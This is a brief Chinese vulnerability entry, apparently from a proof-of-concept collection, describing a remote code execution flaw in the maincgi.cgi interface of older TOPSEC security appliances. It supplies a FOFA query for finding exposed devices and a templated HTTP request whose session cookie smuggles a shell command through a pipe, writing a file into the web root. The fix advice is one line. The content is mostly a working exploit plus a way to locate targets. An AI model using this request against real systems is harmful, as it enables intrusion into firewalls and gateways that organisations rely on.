Nx01 产品简介
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。
Nx02 漏洞描述
天融信TOPSEC老版本maincgi接口存在RCE漏洞,攻击者利用此漏洞可以获取服务器权限。
Nx03 产品主页
fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"
Nx04 漏洞复现
POC:
GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Cookie: session_id_443=1|echo 'pmcujhgacrqzrvm' >> /www/htdocs/site/image/cltkfd.txt;
Accept-Encoding: gzip
Nx05 修复建议
建议联系软件厂商进行处理。